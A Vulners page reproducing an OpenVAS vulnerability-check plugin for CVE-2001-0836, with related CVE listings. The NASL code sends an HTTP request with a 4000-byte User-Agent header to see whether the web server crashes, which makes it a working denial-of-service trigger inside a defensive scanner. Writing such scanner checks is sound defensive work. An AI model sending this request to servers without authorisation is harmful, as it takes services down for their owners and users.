Lucene search
K

HTTP User-Agent Overflow DoS Vulnerability

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2002 Michel ArboiType 
openvas
 openvas
🔗 plugins.openvas.org👁 378 Views

HTTP User-Agent Overflow DoS Vulnerability, possible to crash a web server by sending an invalid GET request with a too long User-Agent field, impacting Oracle9iAS Web Cache/2.0.0.1.0 and potentially other versions or products. An attacker may exploit this to crash the server or execute arbitrary code

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2001-0836
9 Mar 200205:00
cve
Cvelist
CVE-2001-0836
9 Mar 200205:00
cvelist
NVD
CVE-2001-0836
6 Dec 200105:00
nvd
OpenVAS
www too long url
23 Jun 200900:00
openvas
OpenVAS
HTTP User-Agent overflow
3 Nov 200500:00
openvas
OpenVAS
WWW Too Long URL DoS Vulnerability
23 Jun 200900:00
openvas
OpenVAS
Oracle 9i Application Server Web Cache 'Too Long URL' DoS Vulnerability - Active Check
3 Nov 200500:00
openvas
Tenable Nessus
Oracle Application Server Web Cache HTTP Request Overflow
14 Aug 200200:00
nessus
Tenable Nessus
Web Server Long URL Handling Remote Overflow DoS
22 Jun 199900:00
nessus
Tenable Nessus
Web Server HTTP User-Agent Header Handling Remote Overflow
13 Aug 200200:00
nessus
Rows per page
# SPDX-FileCopyrightText: 2002 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11069");
  script_version("2023-07-21T05:05:22+0000");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/3443");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/3449");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/7054");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2001-0836");
  script_name("HTTP User-Agent Overflow DoS Vulnerability");
  script_category(ACT_DENIAL);
  # All the www_too_long_*.nasl scripts were first declared as
  # ACT_DESTRUCTIVE_ATTACK, but many web servers are vulnerable to them:
  # The web server might be killed by those generic tests before the scanner
  # has a chance to perform known attacks for which a patch exists
  # As ACT_DENIAL are performed one at a time (not in parallel), this reduces
  # the risk of false positives.

  script_copyright("Copyright (C) 2002 Michel Arboi");
  script_family("Gain a shell remotely");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"solution", value:"Upgrade your software or protect it with a filtering reverse proxy.");

  script_tag(name:"summary", value:"It was possible to kill the web server by
  sending an invalid GET request with a too long User-Agent field.");

  script_tag(name:"impact", value:"An attacker may exploit this vulnerability to make the web server
  crash continually or even execute arbirtray code on your system.");

  script_tag(name:"affected", value:"Oracle9iAS Web Cache/2.0.0.1.0 is known to be affected. Other
  versions or products might be affected as well.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

include("http_func.inc");
include("port_service_func.inc");

port = http_get_port(default:80);
if(http_is_dead(port: port))
  exit(0);

soc = http_open_socket(port);
if(! soc)
  exit(0);

# NB: Need at least 4000 bytes to crash Oracle Web
# r = string("GET / HTTP/1.0\r\nUser-Agent: ", crap(4000), "\r\n\r\n");
# Nice trick from Renaud to handle HTTP/1.1 requests:
r = http_get(item:"/", port:port);
ua = egrep(pattern:"^User-Agent:", string:r);
if(ua) {
  r = r - ua;
}

r = r - string("\r\n\r\n");
r = string(r, "\r\n", "User-Agent: ", crap(4000), "\r\n\r\n");
send(socket:soc, data:r);
r = http_recv(socket:soc);
http_close_socket(soc);

if(http_is_dead(port:port)) {
  security_message(port:port);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jul 2023 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 27.5
EPSS0.14665
378